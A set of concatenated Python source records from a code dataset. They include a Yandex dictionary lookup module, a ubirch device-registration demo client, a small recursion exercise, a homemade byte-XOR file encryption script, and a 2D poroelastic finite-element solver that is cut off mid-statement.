edgecolor=\"none\")\nplt.ylabel(r\"$y$\")\nplt.xlabel(r\"$t$\")\nplt.gca().yaxis.set_major_locator(plt.MaxNLocator(5))\nplt.title(\"maximum likelihood prediction\");\nplt.savefig('HD85390-5-prediction.png')\n\n\nos.chdir('..')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"0828-GP_85390/celerite1536200028.9306116/GP_85390_celerite_1_planet.py","file_name":"GP_85390_celerite_1_planet.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"72298785","text":"\"\"\"\nThis module provides API functionality for yandex lingvo services.\n\"\"\"\n\nimport logging\nimport requests\n\nimport pyaspeller\n\nlogging.getLogger(__name__).addHandler(logging.NullHandler())\n\nYKEY = ''\nENDPOINT = 'https://dictionary.yandex.net/api/v1/dicservice.json/lookup?'\n\n\ndef answer_spellcheck(spellcheck, translate):\n if spellcheck:\n if not spellcheck.correct:\n if spellcheck.spellsafe:\n if translate:\n return ' _Your request was corrected!_\\n' + translate\n return ' _Your request was corrected!_\\n'\n return translate\n\n\ndef prepare_message(msg):\n if msg.startswith('/tr'):\n msg = msg[4:]\n if not msg:\n return 'Your request is empty. Try again.'\n check = msg.replace('`', '')\n if not check:\n msg = 'tilde(s)'\n else:\n msg = check\n try:\n spellcheck = pyaspeller.Word(msg)\n if spellcheck.spellsafe:\n msg = spellcheck.spellsafe\n except Exception as err:\n logging.exception(str(err))\n spellcheck = None\n try:\n translate = get_word(msg)\n except Exception as err:\n logging.exception(str(err))\n translate = 'Sorry, something went wrong!'\n if not translate:\n translate = answer_spellcheck(spellcheck, translate)\n translate = translate + u\"Sorry, can't find anything for `{}`.\"\n else:\n translate = answer_spellcheck(spellcheck, translate)\n translate = '`{}`\\n' + translate\n return translate.format(msg)\n\n\ndef get_word(src):\n data = requests.get(\n ENDPOINT + requests.compat.urlencode(\n {'key': YKEY, 'lang': 'en-ru', 'text': src})\n )\n json_dump = data.json()\n if not json_dump:\n return\n res = ''\n delimeter = '\\n'\n nbsp = u'\\xa0'\n for _, topic in enumerate(json_dump['def']):\n res += '_{0}_{1}'.format(topic['pos'], delimeter)\n for tr in topic['tr']:\n res += u'*{nbsps}{text}*{delimeter}'.format(\n nbsps=4 * nbsp, text=tr['text'], delimeter=delimeter)\n if 'ex' in tr:\n res += 8 * nbsp + tr['ex'][0]['text'] + ' --- ' + \\\n '//'.join([etr['text']\n for etr in tr['ex'][0]['tr']]) + delimeter\n with open('query_list.log', 'a') as query_list:\n try:\n query_list.write(src + '\\n')\n except UnicodeEncodeError as err:\n logging.exception(str(err))\n return res\n","sub_path":"yadict.py","file_name":"yadict.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525720414","text":"#! /usr/bin/env python3\n#\n# Copyright (c) 2018 ubirch GmbH.\n#\n# @author Matthias L. Jugel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport atexit\nimport binascii\nimport configparser\nimport logging\nimport pickle\nimport time\nfrom datetime import datetime\nfrom uuid import UUID, uuid4\n\nimport requests\n\nimport ubirch\nfrom ubirch.ubirch_protocol import UBIRCH_PROTOCOL_TYPE_REG\n\nlogging.basicConfig(format='%(asctime)s %(name)20.20s %(levelname)-8.8s %(message)s', level=logging.DEBUG)\nlogger = logging.getLogger()\n\n\n########################################################################\n# Implement the ubirch-protocol with signing and saving the signatures\nclass Proto(ubirch.Protocol):\n\n def __init__(self, key_store: ubirch.KeyStore, uuid: UUID) -> None:\n super().__init__()\n self.__ks = key_store\n self.load(uuid)\n logger.info(\"ubirch-protocol: device id: {}\".format(uuid))\n\n def persist(self, uuid: UUID):\n signatures = self.get_saved_signatures()\n with open(uuid.hex + \".sig\", \"wb\") as f:\n pickle.dump(signatures, f)\n\n def load(self, uuid: UUID):\n try:\n with open(uuid.hex + \".sig\", \"rb\") as f:\n signatures = pickle.load(f)\n logger.info(\"loaded {} known signatures\".format(len(signatures)))\n self.set_saved_signatures(signatures)\n except:\n logger.warning(\"no existing saved signatures\")\n pass\n\n def _sign(self, uuid: UUID, message: bytes) -> bytes:\n return self.__ks.find_signing_key(uuid).sign(message)\n\n\n########################################################################\n\n# load configuration from storage\nconfig = configparser.ConfigParser()\nconfig.read('demo-device.ini')\nif not config.has_section('device'):\n config.add_section('device')\n config.set('device', 'uuid', str(uuid4()))\n auth = input(\"Enter your API authentication token:\")\n config.set('device', 'auth', auth)\n config.set('device', 'env', 'demo')\n config.set('device', 'debug', 'False')\n config.set('device', 'groups', '')\n with open('demo-device.ini', \"w\") as f:\n config.write(f)\n\nuuid = UUID(hex=config.get('device', 'uuid'))\nauth = config.get('device', 'auth')\nenv = config.get('device', 'env', fallback=None)\ndebug = config.getboolean('device', 'debug', fallback=False)\ngroups = list(filter(None, config.get('device', 'groups', fallback=\"\").split(\",\")))\n\nlogger.info(\"UUID : {}\".format(uuid))\nlogger.info(\"AUTH : {}\".format(auth))\nlogger.info(\"ENV : {}\".format(env))\nlogger.info(\"DEBUG: {}\".format(debug))\n\n# create a new device uuid and a keystore for the device\nkeystore = ubirch.KeyStore(uuid.hex + \".jks\", \"test-keystore\")\n\n# check if the device already has keys or generate a new pair\nif not keystore.exists_signing_key(uuid):\n keystore.create_ed25519_keypair(uuid)\n\n# create new protocol\nproto = Proto(keystore, uuid)\n\n# use the ubirch API to create a new device and send data using the ubirch-protocol\napi = ubirch.API(auth=auth, debug=debug, env=env)\n\n# check if the device exists and delete if that is the case\nif api.device_exists(uuid):\n logger.warning(\"device {} exists, deleting\".format(str(uuid)))\n api.device_delete(uuid)\n time.sleep(2)\n\n# create a new device on the backend\nr = api.device_create({\n \"deviceId\": str(uuid),\n \"deviceTypeKey\": \"genericSensor\",\n \"deviceName\": str(uuid),\n \"hwDeviceId\": str(uuid),\n \"tags\": [\"demo\", \"python-client\"],\n \"groups\": groups,\n \"deviceProperties\": {\n \"storesData\": True,\n \"blockChain\": False\n },\n \"created\": \"{}Z\".format(datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3])\n})\nif r.status_code == requests.codes.ok:\n logger.info(\"created new device: {}\".format(str(uuid)))\n logger.debug(r.content)\n time.sleep(2)\nelse:\n logger.error(r.content)\n raise Exception(\"new device creation failed\")\n\n# register the devices identity\nif not api.is_identity_registered(uuid):\n registration_message = proto.message_signed(uuid, UBIRCH_PROTOCOL_TYPE_REG, keystore.get_certificate(uuid))\n r = api.register_identity(registration_message)\n if r.status_code == requests.codes.ok:\n logger.info(\"registered new identity: {}\".format(uuid))\n else:\n logger.error(\"device registration failed: {}\".format(uuid))\n logger.debug(r.content)\n\n# send data packages\n\n# message 1 - binary message no payload interpretation\nmsg = proto.message_chained(uuid, 0x00, bytearray([1,2,3,4,5]))\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"1: {}: {}\".format(r.status_code, r.content))\n\n# message 2 - interpreted payload message chained\nmsg = proto.message_chained(uuid, 0x53, {'ts': int(datetime.utcnow().timestamp()), 'v': 99})\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"2: {}: {}\".format(r.status_code, r.content))\n\n# message 3 (chained to message 1)\nmsg = proto.message_chained(uuid, 0x53, {\"ts\": int(datetime.utcnow().timestamp()), \"v\": 100})\nlogger.info(binascii.hexlify(msg))\nr = api.send(msg)\nlogger.info(\"3: {}: {}\".format(r.status_code, r.content))\n\natexit.register(proto.persist, uuid)\n","sub_path":"examples/test-protocol.py","file_name":"test-protocol.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200446027","text":"c=0\ni=1\ndef accept_N(n):\n\tglobal i,c\n\tif(i==1):c=n\n\tif(c>=i):\n\t\tprint(i,end=\" \")\n\t\ti+=1\n\t\taccept_N(i)\n\t\n\nif __name__ == \"__main__\": \n\tprint(\"Input :\",end=\" \")\n\tx=int(input())\n\tprint(\"Output:\",end=\" \")\n\taccept_N(x)","sub_path":"Marvellous_Infosystem_Assignment_5/Assingment5_2.py","file_name":"Assingment5_2.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"567169148","text":"#coding: utf-8\n\ndef pause():\n a = ''\n input(a)\n \ndef read_chunk(f, chunksize):\n while True:\n chunk = f.read(chunksize)\n if chunk:\n yield chunk\n else:\n break\n \ndef decale(M,bytes):\n global l\n if len(M) == l:\n del M[0]\n M.append(bytes)\n return M\n \ndef chiffr(M):\n global l\n S = []\n for i in M[0]:\n S.append(int(i))\n for i in range(len(S)): #Pas forcément = l ! (cas de fin de fichier par ex)\n for j in range(1,l):\n try:\n S[i] ^= M[j].ljust(l,bytes(1))[i]\n except:\n print(\"Problème de chiffrage:\")\n print(M)\n print(\"Ne permet pas d'encoder correctement\")\n pause()\n #if len(M[0]) != 8:\n # print(\"Pouet\")\n return bytes(S) # PAS FORCEMENT DE LONGUEUR l !\n \n#if False: # Pour tester le programme\nl = '' #-----------Début du prompt utilisateur\nprint('Profondeur ? (déf:8)')\ninput(l)\ntry:\n l = int(l)\nexcept:\n l = 8\nif l < 1:\n l = 8\n\nprint('nom/chemin du ficher ?')\nnom_source = input()\ntry:\n f = open(nom_source,'r')\n f.close()\nexcept:\n print('Impossible d\\'ouvrir le fichier à chiffrer')\n exit(-1)\n \nprint('Saisir la clé (s) ou utilier un fichier (f): ')\nchoix = ''\nwhile choix != 's' and choix != 'f':\n choix = input()\nif choix == 's':\n print('Veuillez taper la clé:')\n key = input()\nelse:\n print('Veuillez saisir l\\'adresse de la clé:')\n key_addr = input()\n try:\n f = open(key_addr)\n key = f.read()\n except:\n print('Impossible d\\'ouvrir le fichier clé')\n exit(-1)\nprint('Fichier à écrire ? (défaut: out.dea):')\n\nnom_dest = input()\nif nom_dest == '':\n nom_dest = 'out.dea'\nprint('input: {}'.format(nom_source))\nprint('key: {}'.format(key))\nprint('depth: {}'.format(l))\nprint('output: {}'.format(nom_dest))\nprint('Confirmer les paramètres (y/n)?')\nok = input()\nif ok.lower() not in ['y','o']:\n print(\"Annulation.\")\n exit(0) #---------- Fin du prompt utilisateur\n\n\n#l = 8 #Valeurs de test\n#nom_source = \"a.txt\"\n#key = \"1234568\"\n#nom_dest = \"out.dea\" #---\n\nwhile len(key) < l*(l-1): # Pour avoir une clé de la bonne longueur\n key +=key\nkey = key[:l*(l-1)]\n\n#print(key)\nsource = open(nom_source,\"rb\")\ndest = open(nom_dest,\"wb\")\nM = []\n\nfor i in read_chunk(source, l): #Chiffrage du fichier sans utiliser la clé\n M = decale(M, i)\n if len(M) == l:\n S = chiffr(M)\n dest.write(S)\nsource.close()\n\nrow = ''\nfor i in key: # Chiffrage de la fin, en utilisant la clé\n row += i\n if len(row) == 8:\n M = decale(M,bytes(row,'utf-8'))\n dest.write(chiffr(M))\n row = ''\n\ndest.close()\n\n","sub_path":"crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86233239","text":"\n\n#calss header\nclass _DOMESTIC():\n\tdef __init__(self,): \n\t\tself.name = \"DOMESTIC\"\n\t\tself.definitions = [u'a fight or attack that happens in a home between people who know each other: ', u\"someone paid to do work, such as cleaning and cooking, in someone else's house\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_domestic.py","file_name":"_domestic.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"345704535","text":"import numpy as np\nimport scipy.linalg\nimport scipy.sparse\nimport scipy.sparse.linalg\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport scipy.interpolate\nimport netCDF4\n\nimport warnings\nwarnings.simplefilter(action = \"ignore\", category = FutureWarning)\n\n\nclass TwoDimCoupledFEM():\n \n def __init__(self, nodes, connect, mu, nu, alpha, bc_nodes=[], bc_vals=[]):\n \n self.X = nodes[:,0]\n self.Y = nodes[:,1]\n self.connect = (connect - 1)\n \n self.nu = nu\n self.mu = mu\n self.alpha = alpha\n \n self.num_elem = len(self.connect)\n \n \n def dNdxi(self, xi, eta):\n \n return [eta/4. - eta**2/4. - (eta*xi)/2. + (eta**2*xi)/2.,\n -eta/4. + eta**2/4. - (eta*xi)/2. + (eta**2*xi)/2.,\n eta/4. + eta**2/4. + (eta*xi)/2. + (eta**2*xi)/2.,\n -eta/4. - eta**2/4. + (eta*xi)/2. + (eta**2*xi)/2.,\n eta*xi - eta**2*xi,\n 0.5 - eta**2/2. + xi - eta**2*xi,\n -(eta*xi) - eta**2*xi,\n -0.5 + eta**2/2. + xi - eta**2*xi,\n -2*xi + 2*eta**2*xi]\n \n \n def dNdeta(self, xi, eta):\n \n return [xi/4. - (eta*xi)/2. - xi**2/4. + (eta*xi**2)/2.,\n -xi/4. + (eta*xi)/2. - xi**2/4. + (eta*xi**2)/2.,\n xi/4. + (eta*xi)/2. + xi**2/4. + (eta*xi**2)/2.,\n -xi/4. - (eta*xi)/2. + xi**2/4. + (eta*xi**2)/2.,\n -0.5 + eta + xi**2/2. - eta*xi**2,\n -(eta*xi) - eta*xi**2,\n 0.5 + eta - xi**2/2. - eta*xi**2,\n eta*xi - eta*xi**2,\n -2*eta + 2*eta*xi**2]\n \n def Nu(self, xi, eta):\n \n return [(eta*xi)/4. - (eta**2*xi)/4. - (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -(eta*xi)/4. + (eta**2*xi)/4. - (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n (eta*xi)/4. + (eta**2*xi)/4. + (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -(eta*xi)/4. - (eta**2*xi)/4. + (eta*xi**2)/4. + (eta**2*xi**2)/4.,\n -eta/2. + eta**2/2. + (eta*xi**2)/2. - (eta**2*xi**2)/2.,\n xi/2. - (eta**2*xi)/2. + xi**2/2. - (eta**2*xi**2)/2.,\n eta/2. + eta**2/2. - (eta*xi**2)/2. - (eta**2*xi**2)/2.,\n -xi/2. + (eta**2*xi)/2. + xi**2/2. - (eta**2*xi**2)/2.,\n 1 - eta**2 - xi**2 + eta**2*xi**2]\n \n \n def Np(self, xi, eta):\n \n return [0.25 * (1 - xi) * (1 - eta), # - -\n 0.25 * (1 - xi) * (1 + eta), # - +\n 0.25 * (1 + xi) * (1 + eta), # + +\n 0.25 * (1 + xi) * (1 - eta) ] # - + -\n \n def dNpdxi(self, xi, eta):\n \n return [-1*(1-eta)/4, (1-eta)/4, (1+eta)/4, -1*(1+eta)/4]\n\n def dNpdeta(self, xi, eta):\n \n return [-1*(1-xi)/4, -1*(1-xi)/4, (1+xi)/4, (1-xi)/4] \n \n def dNp(self, xi, eta):\n\n dNp = np.zeros([2,4])\n dNp[0,:] = self.dNpdxi(xi, eta)\n dNp[1,:] = self.dNpdeta(xi, eta)\n \n return dNp \n\n def compute_tensor_mobility(self, k, mu):\n \n # Mobility tensor is 2x2 (2D example)\n \n Q = np.zeros([2,2])\n Q[0,0] = k/mu\n Q[1,1] = k/mu \n \n return Q\n \n def compute_jacobian_matrix_and_inverse(self, xi, eta):\n \n x = self.X\n y = self.Y\n con = self.connect\n \n J11 = np.dot(x[con], self.dNdxi(xi, eta))\n J12 = np.dot(y[con], self.dNdxi(xi, eta))\n J21 = np.dot(x[con], self.dNdeta(xi, eta))\n J22 = np.dot(y[con], self.dNdeta(xi, eta))\n \n self.detJ = J11 * J22 - J12 * J21\n \n self.Jinv11 = J22 / self.detJ\n self.Jinv12 = -J12 / self.detJ\n self.Jinv21 = -J21 / self.detJ\n self.Jinv22 = J11 / self.detJ\n \n \n def compute_B_matrix(self, xi, eta):\n \n self.compute_jacobian_matrix_and_inverse(xi, eta)\n \n dNxi = self.dNdxi(xi, eta)\n dNeta = self.dNdeta(xi, eta)\n \n Nmat = np.zeros((4, 2 * len(dNxi)))\n Nmat[0,0::2] = dNxi\n Nmat[1,0::2] = dNeta\n Nmat[2,1::2] = dNxi\n Nmat[3,1::2] = dNeta\n \n zero = np.zeros(len(self.detJ))\n \n Jmat = np.array([[self.Jinv11, self.Jinv12, zero, zero],\n [self.Jinv21, self.Jinv22, zero, zero],\n [zero, zero, self.Jinv11, self.Jinv12],\n [zero, zero, self.Jinv21, self.Jinv22]])\n \n Dmat = np.array([[1.,0.,0.,0.],[0.,0.,0.,1.],[0.,1.,1.,0.]])\n \n #B = D * J * N\n return np.einsum('ij,jk...,kl',Dmat,Jmat,Nmat)\n \n \n def compute_stiffness_integrand(self, xi, eta, nu, mu):\n \n Ey = 2 * mu * (1 + nu)\n \n c11 = Ey * (1 - nu * nu) / ((1 + nu) * (1 - nu - 2 * nu * nu))\n c12 = Ey * nu / (1 - nu - 2 * nu * nu)\n c66 = Ey / (2 * (1 + nu))\n \n # Strain/Displacement Matrix \n Cmat = np.array([[c11, c12, 0], [c12, c11, 0], [0, 0, c66]]);\n \n self.Bmat = self.compute_B_matrix(xi, eta)\n \n #K_{il} = B_{ji} C_{jk} B_{kl} \\det(J)\n return np.einsum('...ji,jk,...kl,...',self.Bmat,Cmat,self.Bmat,self.detJ)\n \n \n def compute_coupling_integrand(self, xi, eta, alpha):\n \n #Q = B^T * m *alpha * Np\n m = np.array([1.0, 1.0, 0.0]) * alpha\n \n Np = self.Np(xi, eta)\n \n return np.einsum('...ij,i,k,...',self.Bmat,m,Np,self.detJ)\n\n def compute_storativity_integrand(self, xi, eta, alpha, phi, Ks, Kf):\n \n #S = Np^T * ( (alpha - phi)/Ks + phi/Kf ) * Np\n \n Np = self.Np(xi, eta)\n stor = (alpha-phi)/Ks + phi/Kf\n \n return np.einsum('i,...,k,...',Np,stor,Np,self.detJ)\n \n \n def compute_permeability_integrand(self, xi, eta, Q):\n \n # H = dNp^T * (k/mu) * dNp\n \n dNp = self.dNp(xi, eta)\n \n return np.einsum('...ji,jk,...kl,...',dNp,Q,dNp,self.detJ)\n \n def compute_body_force_RHS(self, xi, eta, rho, g):\n \n # Fg = Nu^T * rho * g \n \n Nu = self.Nu(xi, eta)\n Nu = np.array(Nu).reshape([1,np.size(Nu)])\n \n return np.einsum('...ji,...,...,...',Nu,rho,g,self.detJ)\n \n def compute_fluid_pressure_force(self, xi, eta, Q, rho_f):\n \n # Fp = dNp^T * (k/mu) * rho_f * g\n g = np.zeros([2,1])\n g[1] = self.g\n dNp = self.dNp(xi, eta)\n return np.einsum('...ji,jk,...,kl...,...',dNp,Q,rho_f,g,self.detJ) \n return dNp\n \n \n def integrate_element_matrices(self):\n \n #Use 3 x 3 Gauss integration\n wts = [5 / 9., 8 / 9., 5 / 9.]\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n # Make up permeability/viscosity info\n perm = 10. *9.8692327E-16 # m**2\n visc = 0.002 # Pa*sec\n phi = 0.1\n Vp = 2360 # m/s\n Vs = 1302 # m/s\n rho_m = 2260 # kg/m**3\n rho_f = 1000 # kg/m**3\n rho = rho_m*(1.0-phi) + rho_f*phi # Bulk Density, kg/m**3\n Ks = rho*(Vp**2 - 0.75 * Vs**2) # Bulk (solid) Modulus, Pa\n Kf = 1/1e9 # Fluid Modulus, Pa (1/cf)\n \n \n \n # Ditto Delta T\n \n self.delta_t = 3600 # sec \n \n \n mob_tensor = self.compute_tensor_mobility(perm,visc)\n # Temporary global setting\n self.mob_tensor = self.compute_tensor_mobility(perm,visc) \n \n \n K = np.zeros((self.num_elem, 18, 18))\n Q = np.zeros((self.num_elem, 18, 4))\n H = np.zeros((self.num_elem, 4, 4))\n S = np.zeros((self.num_elem, 4, 4))\n \n for i in range(3):\n for j in range(3):\n K += wts[i] * wts[j] * self.compute_stiffness_integrand(pts[i], pts[j], self.nu, self.mu)\n Q += wts[i] * wts[j] * self.compute_coupling_integrand(pts[i], pts[j], self.alpha)\n H += wts[i] * wts[j] * self.compute_permeability_integrand(pts[i], pts[j], mob_tensor)\n S += wts[i] * wts[j] * self.compute_storativity_integrand(pts[i], pts[j], self.alpha, phi, Ks, Kf)\n \n return (K,Q,H,S)\n \n def integrate_RHS(self):\n\n #Use 3 x 3 Gauss integration\n wts = [5 / 9., 8 / 9., 5 / 9.]\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n Fgu = np.zeros((self.num_elem,9,1))\n Fgp = np.zeros((self.num_elem,4,1)) \n \n for i in range(3):\n for j in range(3):\n Fgu += wts[i] * self.compute_body_force_RHS(pts[i],pts[j],self.rho,self.g)\n Fgp += wts[i] * self.compute_fluid_pressure_force(pts[i], pts[j], self.mob_tensor, self.rho_f)\n return Fgu, Fgp \n\n \n def set_mesh_properties(self):\n\n # Make up permeability/viscosity info\n self.perm = 10. *9.8692327E-16 # m**2\n self.visc = 0.002 # Pa*sec\n self.phi = 0.1\n self.Vp = 2360 # m/s\n self.Vs = 1302 # m/s\n self.rho_m = 2260 # kg/m**3\n self.rho_f = 1000 # kg/m**3\n self.rho = self.rho_m*(1.0-self.phi) + self.rho_f*self.phi # Bulk Density, kg/m**3\n self.Ks = self.rho*(self.Vp**2 - 0.75 * self.Vs**2) # Bulk (solid) Modulus, Pa\n self.Kf = 1/1e9 # Fluid Modulus, Pa (1/cf)\n self.g = 9.80 # m/s**2 \n \n def compute_stress_at_gauss_point(self, xi, eta, disp):\n \n mu = self.mu\n nu = self.nu\n \n Ey = 2 * mu * (1 + nu)\n \n c11 = Ey * (1 - nu * nu) / ((1 + nu) * (1 - nu - 2 * nu * nu))\n c12 = Ey * nu / (1 - nu - 2 * nu * nu)\n c66 = Ey / (2 * (1 + nu))\n \n Cmat = np.array([[c11, c12, 0], [c12, c11, 0], [0, 0, c66]]);\n \n Bmat = self.compute_B_matrix(xi, eta)\n \n elem_disp = disp[self.connect].reshape(-1,18)\n \n #stress_{i} = C_{ik} B_{kl} disp{l}\n return np.einsum('ik,...kl,...l',Cmat,Bmat,elem_disp).reshape(-1,3)\n \n \n def compute_stress(self, disp):\n \n #Gauss points\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n return np.array([[ self.compute_stress_at_gauss_point(i, j, disp) for i in pts ] for j in pts])\n \n \n def compute_gauss_point_locations(self, coords):\n \n #Gauss points\n pts = [-np.sqrt(3 / 5.), 0.0, np.sqrt(3 / 5.)]\n \n X = coords[:,0][self.connect]\n Y = coords[:,1][self.connect]\n \n xloc = np.array([[ np.dot(X, self.Nu(i, j)) for i in pts ] for j in pts]).flatten()\n yloc = np.array([[ np.dot(Y, self.Nu(i, j)) for i in pts ] for j in pts]).flatten()\n \n return (xloc, yloc)\n \n \n def assemble(self):\n \n # Institute debug system values\n self.set_mesh_properties()\n \n #Construct a DOF map. We'll start by assuming that every node has 3 DOF\n #this is obviously not true, but we'll correct it.\n fake_dof_map = np.zeros(3*len(self.X), dtype=np.int64).reshape(-1, 3)\n \n #The nodes that actually have pressue DOF's are the \"corner\" nodes of the element\n #or the first 4 nodes in each row of the connectivity array, let's select the others\n no_pressure_dof_nodes = (self.connect[:,4:]).flatten()\n \n #Now for these nodes that do not have pressure DOF's, we'll \"flag\" those DOFs with a -1\n fake_dof_map[:,2][no_pressure_dof_nodes] = -1\n fake_dof_map = fake_dof_map.flatten()\n \n #Now the rest of the DOF indices are not monotonically increasing (we removed some of them\n #and replaced them with -1's), so now we need to replace the non -1 entries with a monotonically\n #increasing DOF map that corresponds to the total number of DOF's. First let's figure out\n #how many total DOF's ther are, this corresponds to wherever there are 0's in the fake_dof_map\n total_dof = (fake_dof_map == 0).sum()\n \n #Create a monotonically increasing range from 0 to the total_dof\n dof_range = np.arange(total_dof, dtype=np.int64)\n \n #Replace the 0's in the fake_dof_map with the monotonically increasing range\n fake_dof_map[np.where(fake_dof_map != -1)] = dof_range\n \n #Create the real dof_map, there will still be -1 \"flags\" in the third column\n self.dof_map = fake_dof_map.reshape(-1,3)\n \n #Allocate global stiffness matrix and r.h.s vector\n self.Mat_K = np.zeros((total_dof, total_dof), dtype=np.double)\n self.Mat_K_n = np.zeros((total_dof, total_dof), dtype=np.double) \n self.Vec_F = np.zeros(total_dof, dtype=np.double)\n \n #The DOF indices cooresponding to displacement\n id_disp = (self.dof_map[:,:2][self.connect]).reshape(-1,18)\n # DOF indicies for x dir displacement\n idx_disp = (self.dof_map[:,0][self.connect]).reshape(-1,9) \n # DOF indicies for x dir displacement\n idy_disp = (self.dof_map[:,1][self.connect]).reshape(-1,9) \n \n #The DOF indices cooresponding to pressure, they should not have any -1's\n #because we only choose those that in the first 4 columns of each row in\n #the connectivity\n id_pres = self.dof_map[:,-1][self.connect[:,:4]]\n \n #Integrate element stiffness matrices\n K, Q, H, S = self.integrate_element_matrices()\n\n #Integrate RHS\n self.Fgu_old = np.zeros((self.num_elem,9,1))\n \n Fgu, Fgp = self.integrate_RHS() \n \n #Assemble into global stiffness matrix\n for i in range(self.num_elem):\n \n # Add elastic stiffness matrix \n idx_grid_disp = np.ix_(id_disp[i], id_disp[i])\n self.Mat_K[idx_grid_disp] += -1*K[i]\n \n # Add coupling matrix\n idx_grid_pres = np.ix_(id_disp[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += Q[i]\n \n # Add transposed coupling matrix\n idx_grid_pres = np.ix_(id_pres[i], id_disp[i])\n self.Mat_K[idx_grid_pres] += Q[i].T\n\n # Add Storativity Matrix \n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += S[i]\n\n # Add Fluid Permeability Matrix\n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += H[i] * self.delta_t / 2\n\n\n #Assemble into global stiffness matrix for RHS\n \n # Add elastic stiffness matrix \n idx_grid_disp = np.ix_(id_disp[i], id_disp[i])\n self.Mat_K_n[idx_grid_disp] += -1*K[i]\n \n # Add coupling matrix\n idx_grid_pres = np.ix_(id_disp[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] += Q[i]\n \n # Add transposed coupling matrix\n idx_grid_pres = np.ix_(id_pres[i], id_disp[i])\n self.Mat_K_n[idx_grid_pres] += Q[i].T\n\n # Add Storativity Matrix \n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] += S[i]\n\n # Add Fluid Permeability Matrix\n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] -= H[i] * self.delta_t / 2\n\n #Institute Body Forces (grav)\n \n # Add displacement body force\n idy_vec_disp = np.ix_(idy_disp[i])\n self.Vec_F[idy_vec_disp] -= (Fgu[i].ravel() - self.Fgu_old[i].ravel()) / self.delta_t\n \n idx_vec_pres = np.ix_(id_pres[i])\n self.Vec_F[idx_vec_pres] += Fgp[i].ravel()\n \n def apply_essential_bc(self, nodes, values, dof=\"x\"):\n \n node_idx = nodes - 1\n \n if dof == \"x\":\n dof_idx = 0\n elif dof == \"y\":\n dof_idx = 1\n elif dof == \"p\":\n dof_idx = 2\n \n row_replace = np.zeros(len(self.Mat_K))\n \n for value_idx, node in enumerate(node_idx): \n \n row_idx = self.dof_map[node][dof_idx]\n \n self.Mat_K[row_idx] = row_replace\n self.Mat_K[row_idx,row_idx] = 1\n self.Vec_F[row_idx] = values[value_idx]\n \n \n def solve(self):\n \n self.Mat_K = scipy.sparse.csr_matrix(self.Mat_K)\n self.Mat_K_n = scipy.sparse.csr_matrix(self.Mat_K)\n self.Vec_F = self.Mat_K_n*self.Vec_F + self.delta_t*self.Vec_F\n \n return scipy.sparse.linalg.spsolve(self.Mat_K,self.Vec_F)\n################################################################################\n \ncoords = np.loadtxt(\"coords.csv\", delimiter=',', dtype=np.double)\nconnect = np.loadtxt(\"connect.csv\", delimiter=',', dtype=np.int64)\nns1 = np.loadtxt(\"nodeset1.csv\", delimiter=',', dtype=np.int64)\nns2 = np.loadtxt(\"nodeset2.csv\", delimiter=',', dtype=np.int64)\nns3 = np.loadtxt(\"nodeset3.csv\", delimiter=',', dtype=np.int64)\nns4 = np.loadtxt(\"nodeset4.csv\", delimiter=',', dtype=np.int64)\n\n# Load from .exo file\n\nnc = netCDF4.Dataset('Inclusion2D_Coarse.exo')\nconnect1 = nc.variables['connect1'][:]\nconnect2 = nc.variables['connect2'][:]\nconnect3 = nc.variables['connect3'][:]\n\nconnect = np.vstack( (connect1,connect2,connect3))\ncoordx = nc.variables['coordx'][:]\ncoordy = nc.variables['coordy'][:]\ncoords = np.vstack((coordx,coordy)).T\n\nleft = nc.variables['node_ns2'][:]\nfloor = nc.variables['node_ns3'][:]\nright = nc.variables['node_ns4'][:]\ntop = nc.variables['node_ns5'][:]\n\n\nproblem = TwoDimCoupledFEM(coords, connect, nu=0.3, mu=9722223330304.0, 